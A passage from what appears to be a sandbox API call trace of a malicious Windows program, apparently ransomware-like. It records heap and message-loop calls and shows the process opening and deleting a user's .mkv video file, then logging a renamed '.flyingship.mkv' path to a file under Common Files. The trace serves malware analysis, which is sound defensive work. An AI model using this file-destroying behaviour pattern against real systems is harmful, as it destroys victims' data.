hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0199.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.786] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.786] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.786] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.786] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.787] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.787] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\syi8lj9.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.788] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.788] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.788] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.788] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.788] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.789] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.789] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.789] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.789] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.789] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.789] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.789] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpFilePart=0x0) returned 0x3e [0199.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0x1bf98c20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 0x90ae18 [0199.790] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\syi8lj9.mkv")) returned 1 [0199.792] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0x1bf98c20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 0 [0199.792] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.795] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.795] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.796] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0199.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.796] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.796] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.796] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.796] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.796] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.798] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.799] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3fc6, lpOverlapped=0x0) returned 1 [0199.799] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3fc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.799] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0199.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x9238c0 [0199.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n", cchWideChar=76, lpMultiByteStr=0x9238c0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 76 [0199.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0199.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0199.800] WriteFile (in: hFile=0x160, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4b, lpOverlapped=0x0) returned 1 [0199.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0199.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.800] CloseHandle (hObject=0x160) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.802] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.802] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: 